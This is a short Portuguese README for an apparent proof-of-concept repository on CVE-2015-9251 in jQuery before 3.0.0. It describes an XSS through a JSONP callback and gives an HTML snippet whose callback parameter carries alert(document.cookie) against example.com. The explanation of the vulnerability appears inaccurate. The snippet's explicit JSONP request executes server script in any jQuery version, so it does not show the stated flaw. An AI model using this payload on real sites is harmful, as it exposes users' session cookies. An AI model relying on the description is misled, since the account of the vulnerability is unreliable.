
PoC para CVE-2015-9251 jQuery menor que 3.0.0.
PoC para CVE-2015-9251 jQuery menor que 3.0.0.
Este repositório contém uma Prova de Conceito (PoC) para a vulnerabilidade CVE-2015-9251 na biblioteca jQuery. A vulnerabilidade permite um ataque de Cross-Site Scripting (XSS) por meio de chamadas JSONP sem sanitização, porque o jQuery permite a injeção de código no parâmetro callback em versões anteriores à 3.0.0.
CVE-2015-9251 afeta versões do jQuery anteriores à 3.0.0. A vulnerabilidade é explorada ao manipular o parâmetro callback em uma solicitação JSONP, o que pode permitir a execução de código JavaScript arbitrário no navegador da vítima. Isso pode levar à exposição de dados sensíveis, como os cookies de sessão.
Para executar o PoC, siga estes passos:
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
// Función que simula una solicitud a un servidor vulnerable
$.ajax({
url: "https://example.com/api?callback=alert(document.cookie)",
dataType: "jsonp", // JSONP permite la ejecución de código en JSONP callbacks
success: function(response) {
console.log(response);
}
});
</script>